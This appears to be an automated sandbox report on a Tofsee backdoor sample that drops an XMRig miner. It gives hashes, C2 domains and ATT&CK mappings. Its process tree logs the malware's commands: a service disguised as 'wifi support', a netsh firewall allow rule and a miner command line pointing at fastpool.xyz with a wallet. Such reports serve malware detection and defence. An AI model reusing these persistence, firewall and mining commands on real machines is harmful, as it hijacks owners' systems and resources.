Analysis

  • max time kernel
    197s
  • max time network
    213s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-12-2022 13:16

General

  • Target

    3df93116fbfe376675cddec3c61800db395662efb978f06165e0d71ba470dc46.exe

  • Size

    184KB

  • MD5

    60d25cb165031da6b27d3bfd04daf7b9

  • SHA1

    ec461741b9fff50dd225d821baa208b1c2e162bf

  • SHA256

    3df93116fbfe376675cddec3c61800db395662efb978f06165e0d71ba470dc46

  • SHA512

    83138e781de32484bfafe7f9057267a3803fb8ed57dbf881ab0488f4fc0356d7d1554a71887f908b8be9b2bdba57de338c583a91d0233dadd62553ff61723dcc

  • SSDEEP

    3072:KXLf9u/CNgqq5g+cf8v+kCaBwP4m7c3evDAbEamaA:CNgq6Y7X7c3esEama

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3df93116fbfe376675cddec3c61800db395662efb978f06165e0d71ba470dc46.exe
    "C:\Users\Admin\AppData\Local\Temp\3df93116fbfe376675cddec3c61800db395662efb978f06165e0d71ba470dc46.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4740
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\catdtffb\
      2⤵
        PID:2184
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\admxxttq.exe" C:\Windows\SysWOW64\catdtffb\
        2⤵
          PID:4668
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create catdtffb binPath= "C:\Windows\SysWOW64\catdtffb\admxxttq.exe /d\"C:\Users\Admin\AppData\Local\Temp\3df93116fbfe376675cddec3c61800db395662efb978f06165e0d71ba470dc46.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:2172
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description catdtffb "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:4472
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start catdtffb
          2⤵
          • Launches sc.exe
          PID:2392
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1528
      • C:\Windows\SysWOW64\catdtffb\admxxttq.exe
        C:\Windows\SysWOW64\catdtffb\admxxttq.exe /d"C:\Users\Admin\AppData\Local\Temp\3df93116fbfe376675cddec3c61800db395662efb978f06165e0d71ba470dc46.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2144
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:3376
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4404
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 532
          2⤵
          • Program crash
          PID:1672
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2144 -ip 2144
        1⤵
          PID:1492

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Persistence

        New Service

        1
        T1050

        Modify Existing Service

        1
        T1031

        Registry Run Keys / Startup Folder

        1
        T1060

        Privilege Escalation

        New Service

        1
        T1050

        Defense Evasion

        Modify Registry

        1
        T1112

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\admxxttq.exe
          Filesize

          10.8MB

          MD5

          b9e6c74eda4356b9e092e25c44af4da4

          SHA1

          0e17b0a33a908fa7bae922e8a12e04503c74ffbe

          SHA256

          76b4e283a3e4d3d5b0aa87a6c3324661a3f330468afd325b35ec6e59d559b572

          SHA512

          bc5e8e87a91a939811500b17a84a29465221a22284d904c14f14483665cdb024eb5ddfd72c6d01553034bd06a455197ffd10eb0fe028d3454fa8bbea1fde8dc1

        • C:\Windows\SysWOW64\catdtffb\admxxttq.exe
          Filesize

          10.8MB

          MD5

          b9e6c74eda4356b9e092e25c44af4da4

          SHA1

          0e17b0a33a908fa7bae922e8a12e04503c74ffbe

          SHA256

          76b4e283a3e4d3d5b0aa87a6c3324661a3f330468afd325b35ec6e59d559b572

          SHA512

          bc5e8e87a91a939811500b17a84a29465221a22284d904c14f14483665cdb024eb5ddfd72c6d01553034bd06a455197ffd10eb0fe028d3454fa8bbea1fde8dc1

        • memory/1528-143-0x0000000000000000-mapping.dmp
        • memory/2144-148-0x0000000000400000-0x0000000000464000-memory.dmp
          Filesize

          400KB

        • memory/2144-147-0x0000000000663000-0x0000000000673000-memory.dmp
          Filesize

          64KB

        • memory/2144-154-0x0000000000400000-0x0000000000464000-memory.dmp
          Filesize

          400KB

        • memory/2172-140-0x0000000000000000-mapping.dmp
        • memory/2184-137-0x0000000000000000-mapping.dmp
        • memory/2392-142-0x0000000000000000-mapping.dmp
        • memory/3376-149-0x0000000000000000-mapping.dmp
        • memory/3376-171-0x0000000002FF0000-0x0000000002FF7000-memory.dmp
          Filesize

          28KB

        • memory/3376-168-0x0000000007B00000-0x0000000007F0B000-memory.dmp
          Filesize

          4.0MB

        • memory/3376-165-0x0000000002FE0000-0x0000000002FE5000-memory.dmp
          Filesize

          20KB

        • memory/3376-162-0x0000000001FE0000-0x0000000001FF0000-memory.dmp
          Filesize

          64KB

        • memory/3376-159-0x0000000001FD0000-0x0000000001FD6000-memory.dmp
          Filesize

          24KB

        • memory/3376-156-0x0000000002800000-0x0000000002A0F000-memory.dmp
          Filesize

          2.1MB

        • memory/3376-150-0x0000000000CA0000-0x0000000000CB5000-memory.dmp
          Filesize

          84KB

        • memory/3376-153-0x0000000000CA0000-0x0000000000CB5000-memory.dmp
          Filesize

          84KB

        • memory/3376-155-0x0000000000CA0000-0x0000000000CB5000-memory.dmp
          Filesize

          84KB

        • memory/4404-174-0x0000000000000000-mapping.dmp
        • memory/4404-180-0x0000000000600000-0x00000000006F1000-memory.dmp
          Filesize

          964KB

        • memory/4404-175-0x0000000000600000-0x00000000006F1000-memory.dmp
          Filesize

          964KB

        • memory/4472-141-0x0000000000000000-mapping.dmp
        • memory/4668-138-0x0000000000000000-mapping.dmp
        • memory/4740-135-0x0000000000598000-0x00000000005A8000-memory.dmp
          Filesize

          64KB

        • memory/4740-132-0x0000000000598000-0x00000000005A8000-memory.dmp
          Filesize

          64KB

        • memory/4740-145-0x0000000000400000-0x0000000000464000-memory.dmp
          Filesize

          400KB

        • memory/4740-144-0x0000000000598000-0x00000000005A8000-memory.dmp
          Filesize

          64KB

        • memory/4740-134-0x0000000000400000-0x0000000000464000-memory.dmp
          Filesize

          400KB

        • memory/4740-133-0x00000000004E0000-0x00000000004F3000-memory.dmp
          Filesize

          76KB

        • memory/4740-136-0x00000000004E0000-0x00000000004F3000-memory.dmp
          Filesize

          76KB